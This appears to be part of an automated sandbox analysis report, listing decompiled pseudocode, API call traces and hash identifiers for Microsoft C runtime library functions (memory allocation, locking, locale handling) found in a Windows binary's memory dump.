                                        • __init_pointers.LIBCMT ref: 01061738
                                          • Part of subcall function 01061BC7: RtlEncodePointer.NTDLL(00000000,?,0106173D,0106112C,0107CCC0,00000014), ref: 01061BCA
                                          • Part of subcall function 01061BC7: __initp_misc_winsig.LIBCMT ref: 01061BE5
                                          • Part of subcall function 01061BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01062DAE
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01062DC2
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01062DD5
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01062DE8
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01062DFB
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01062E0E
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01062E21
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01062E34
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01062E47
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01062E5A
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01062E6D
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01062E80
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01062E93
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01062EA6
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01062EB9
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01062ECC
                                        • __mtinitlocks.LIBCMT ref: 0106173D
                                        • __mtterm.LIBCMT ref: 01061746
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 01063182
                                          • Part of subcall function 010617AE: _free.LIBCMT ref: 01063189
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(0107E058,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 010631AB
                                        • __calloc_crt.LIBCMT ref: 0106176B
                                        • __initptd.LIBCMT ref: 0106178D
                                        • GetCurrentThreadId.KERNEL32 ref: 01061794
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        • Opcode ID: caf63507ecc4e9c7e60775b3a7a71005ef4d38626416fa7b9d546d74463cd3f4
                                        • Instruction ID: 11304d4fe9ea5885aab4587ac3a0492065e43b777ef5c1896b8c4a878036415c
                                        • Opcode Fuzzy Hash: caf63507ecc4e9c7e60775b3a7a71005ef4d38626416fa7b9d546d74463cd3f4
                                        • Instruction Fuzzy Hash: ADF09032A197131DF2757A79BC0A7CE2AECBF92630B204A6AF4D4D90C4FF3984418294
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106879C, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0106879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				signed int _t12;
				intOrPtr* _t16;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x107cf60);
				_t10 = E010627F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					_t12 = E01063117(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *((intOrPtr*)(_t31 + 4)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x107e5b0) {
							E010632B6( *((intOrPtr*)(_t31 + 4)));
						}
					}
					 *(_t32 - 4) = 0xfffffffe;
					E01068DC1();
					if( *_t31 != 0) {
						E01063117(0xc);
						 *(_t32 - 4) = 1;
						E0106363B( *_t31);
						_t16 =  *_t31;
						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x107e2e8) {
							E010634E1(_t16);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E01068DCD();
					}
					_t10 = E010632B6(_t31);
				}
				return E01062835(_t10);
			}








                                        0x01068d1f
                                        0x01068d21
                                        0x01068d26
                                        0x01068d2b
                                        0x01068d30
                                        0x01068d38
                                        0x01068d3e
                                        0x01068d47
                                        0x01068d4c
                                        0x01068d50
                                        0x01068d5e
                                        0x01068d63
                                        0x01068d50
                                        0x01068d64
                                        0x01068d6b
                                        0x01068d73
                                        0x01068d77
                                        0x01068d7d
                                        0x01068d86
                                        0x01068d8c
                                        0x01068d90
                                        0x01068d9f
                                        0x01068da4
                                        0x01068da5
                                        0x01068dac
                                        0x01068dac
                                        0x01068db2
                                        0x01068db7
                                        0x01068dbd

                                        APIs
                                        • __lock.LIBCMT ref: 01068D38
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • _free.LIBCMT ref: 01068D5E
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • __lock.LIBCMT ref: 01068D77
                                        • ___removelocaleref.LIBCMT ref: 01068D86
                                        • ___freetlocinfo.LIBCMT ref: 01068D9F
                                        • _free.LIBCMT ref: 01068DB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction ID: 205b0c7eafba4a618c5dd71e5056d29ef6abffd32cd48716cb0339ad8747cd66
                                        • Opcode Fuzzy Hash: de853d795705d08363352fa9e35aabc29b0e3a46d5e5f0da43bf2c80df1e49da
                                        • Instruction Fuzzy Hash: A7019231542706DAEBB9BB68D844798B7EC6F30721F24858EE5E86E1D0DF748580C664
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01087BA7, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID:
                                        • API String ID: 3509577899-0
                                        • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction ID: ba12d05f766bd89723834d416a93fcf7bd807e6db9d38219fbf719da127f4fb7
                                        • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction Fuzzy Hash: 3D51B173618216ABEB25BF68CC80EBF7BF9EB54650F2546A8EEC4D6144EB34DC40C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010659FE, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E010659FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x10bfd1c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x10c0a40 - _t7;
								if(__eflags == 0) {
									_t9 = E01064196(__eflags);
									 *_t9 = E010641EF(GetLastError());
									goto L17;
								} else {
									__eflags = E0106455B(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E01064196(__eflags);
										 *_t12 = E010641EF(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0106455B(_t6, _t31);
						 *((intOrPtr*)(E01064196(__eflags))) = 0xc;
						goto L12;
					} else {
						E010632B6(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0106596C(__ebx, __edx, __edi, _a8);
				}
			}









                                        0x01065a05
                                        0x01065a13
                                        0x01065a16
                                        0x01065a18
                                        0x01065a27
                                        0x01065a5a
                                        0x01065a5a
                                        0x01065a5d
                                        0x00000000
                                        0x00000000
                                        0x01065a2a
                                        0x01065a2c
                                        0x01065a2e
                                        0x01065a2e
                                        0x01065a2e
                                        0x01065a3b
                                        0x01065a41
                                        0x01065a43
                                        0x01065a45
                                        0x01065aa5
                                        0x01065aa5
                                        0x01065a47
                                        0x01065a47
                                        0x01065a4d
                                        0x01065a8f
                                        0x01065aa3
                                        0x00000000
                                        0x01065a4f
                                        0x01065a56
                                        0x01065a58
                                        0x01065a77
                                        0x01065a8b
                                        0x01065a71
                                        0x01065a71
                                        0x01065a71
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01065a58
                                        0x01065a4d
                                        0x00000000
                                        0x01065a73
                                        0x01065a60
                                        0x01065a6b
                                        0x00000000
                                        0x01065a1a
                                        0x01065a1d
                                        0x01065a23
                                        0x01065a23
                                        0x01065a74
                                        0x01065a76
                                        0x01065a07
                                        0x01065a11
                                        0x01065a11

                                        APIs
                                        • _malloc.LIBCMT ref: 01065A0A
                                          • Part of subcall function 0106596C: __FF_MSGBANNER.LIBCMT ref: 01065983
                                          • Part of subcall function 0106596C: __NMSG_WRITE.LIBCMT ref: 0106598A
                                          • Part of subcall function 0106596C: HeapAlloc.KERNEL32(012C0000,00000000,00000001,00000000,00000000,00000000,?,0106334C,00000000,00000000,00000000,00000000,?,01063201,00000018,0107CDB0), ref: 010659AF
                                        • _free.LIBCMT ref: 01065A1D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction ID: f78d5f34113f0e61f70c23818527253ab988fdacd78ea6edbdeb71e0048968f4
                                        • Opcode Fuzzy Hash: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction Fuzzy Hash: BE118636504716EFDB717F78AC846AD3BDC9F242A0F104566F9D9DA141EB3589408790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106F3F6, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E010637C4( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0106F121( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E01064196(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                        0x0106f3fe
                                        0x0106f403
                                        0x0106f41d
                                        0x00000000
                                        0x0106f41d
                                        0x0106f405
                                        0x0106f40a
                                        0x00000000
                                        0x00000000
                                        0x0106f40f
                                        0x0106f42c
                                        0x0106f431
                                        0x0106f434
                                        0x0106f43b
                                        0x0106f45a
                                        0x0106f461
                                        0x0106f463
                                        0x0106f4a7
                                        0x0106f4b6
                                        0x0106f4c4
                                        0x0106f4c6
                                        0x0106f4d6
                                        0x0106f4d6
                                        0x0106f4da
                                        0x0106f4dc
                                        0x0106f4df
                                        0x0106f4df
                                        0x0106f4df
                                        0x0106f4df
                                        0x00000000
                                        0x0106f4e5
                                        0x0106f4c8
                                        0x0106f4c8
                                        0x0106f4cd
                                        0x0106f4cd
                                        0x0106f4d0
                                        0x00000000
                                        0x0106f4d0
                                        0x0106f465
                                        0x0106f468
                                        0x0106f46c
                                        0x0106f495
                                        0x0106f495
                                        0x0106f498
                                        0x0106f498
                                        0x00000000
                                        0x00000000
                                        0x0106f49a
                                        0x0106f49e
                                        0x00000000
                                        0x00000000
                                        0x0106f4a0
                                        0x0106f4a0
                                        0x00000000
                                        0x0106f4a0
                                        0x0106f46e
                                        0x0106f471
                                        0x00000000
                                        0x00000000
                                        0x0106f475
                                        0x0106f488
                                        0x0106f48e
                                        0x0106f491
                                        0x0106f493
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106f493
                                        0x0106f43d
                                        0x0106f440
                                        0x0106f442
                                        0x0106f447
                                        0x0106f447
                                        0x0106f44c
                                        0x00000000
                                        0x0106f44c
                                        0x0106f411
                                        0x0106f416
                                        0x0106f41a
                                        0x0106f41a
                                        0x00000000

                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0106F42C
                                        • __isleadbyte_l.LIBCMT ref: 0106F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F4BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction ID: 9cae400fde65ca157654dee80779df27549578146d198d94eca8352c2391c763
                                        • Opcode Fuzzy Hash: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction Fuzzy Hash: 3531C330600247AFDB22CE28E854BBA7FF9FF41220F154169E8A497590DB30D850CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 010687A1, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E010687A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t40;
				void* _t41;

				_push(0xc);
				_push(0x107cf38);
				E010627F0(__ebx, __edi, __esi);
				_t28 = E010615FE();
				_t40 = E010632EE(8, 1);
				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
				_t43 = _t40;
				if(_t40 != 0) {
					E010636DB(_t28, __edx, 1, _t40, __eflags);
					E01063AF6(_t28, __edx, 1, _t40, __eflags);
					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
					E01063117(0xc);
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E0106344C( *_t40);
					 *(_t41 - 4) = 0xfffffffe;
					E01068E70();
					E01063117(0xd);
					 *(_t41 - 4) = 1;
					asm("lock xadd [eax], edi");
					__eflags = 2;
					 *(_t41 - 4) = 0xfffffffe;
					E01068E7C();
					_t24 = _t40;
				} else {
					 *((intOrPtr*)(E01064196(_t43))) = 0xc;
					_t24 = 0;
				}
				return E01062835(_t24);
			}







                                        0x01068dd6
                                        0x01068dd8
                                        0x01068ddd
                                        0x01068de7
                                        0x01068df6
                                        0x01068df8
                                        0x01068dfb
                                        0x01068dfd
                                        0x01068e0e
                                        0x01068e13
                                        0x01068e1b
                                        0x01068e20
                                        0x01068e25
                                        0x01068e2b
                                        0x01068e31
                                        0x01068e37
                                        0x01068e3e
                                        0x01068e45
                                        0x01068e4b
                                        0x01068e51
                                        0x01068e55
                                        0x01068e56
                                        0x01068e5d
                                        0x01068e62
                                        0x01068dff
                                        0x01068e04
                                        0x01068e0a
                                        0x01068e0a
                                        0x01068e69

                                        APIs
                                          • Part of subcall function 010615FE: __getptd_noexit.LIBCMT ref: 010615FF
                                          • Part of subcall function 010615FE: __amsg_exit.LIBCMT ref: 0106160C
                                        • __calloc_crt.LIBCMT ref: 01068DEF
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • __lock.LIBCMT ref: 01068E25
                                        • ___addlocaleref.LIBCMT ref: 01068E31
                                        • __lock.LIBCMT ref: 01068E45
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: ba12ebdd6533bb649224a90c404662ddada4d4d54380fc9c01be9333a190581c
                                        • Instruction ID: ed79b797b199567b6beb09da8a3a6740a72e3d513c320f02d58842ccb50fc915
                                        • Opcode Fuzzy Hash: ba12ebdd6533bb649224a90c404662ddada4d4d54380fc9c01be9333a190581c
                                        • Instruction Fuzzy Hash: 32015231A05302EFD720BFB98901B9DB7E8AF65720F10814AE4D99F2D0DB745D41CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01072F81, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E01072F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E010734F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E01073025(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E010737A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E010736C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                        0x01072f84
                                        0x01072f8a
                                        0x01072ffd
                                        0x00000000
                                        0x01072f91
                                        0x01072f91
                                        0x01072f94
                                        0x01072faf
                                        0x01072fb2
                                        0x01072fd2
                                        0x01072fe4
                                        0x01072fb4
                                        0x01072fb4
                                        0x01072fb7
                                        0x00000000
                                        0x01072fb9
                                        0x01072fcb
                                        0x01072fcb
                                        0x01072fb7
                                        0x01073002
                                        0x01073006
                                        0x01072f96
                                        0x01072fae
                                        0x01072fae
                                        0x01072f94

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: a8f7806c986f01df1c3fc52e3d4c6ab4070d4a5267a5bcfa79cf02249f7dcfa9
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 9E01497280014EBBDF275E88CC15CEE3F66BF18354B498565FE9858131D237CAB1AB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01082892, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 01082892
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 01082897
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0108289C
                                          • Part of subcall function 01082AB1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 01082AC2
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 010828B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: b1c52812ca530411cef9d31a1f07505b78d713714c0642a0fdd6fa815063bdab
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: F3C04C3842D223D22C713E7422101ED77404CB269878620C29CC2175038E05410BD433
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0108674A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
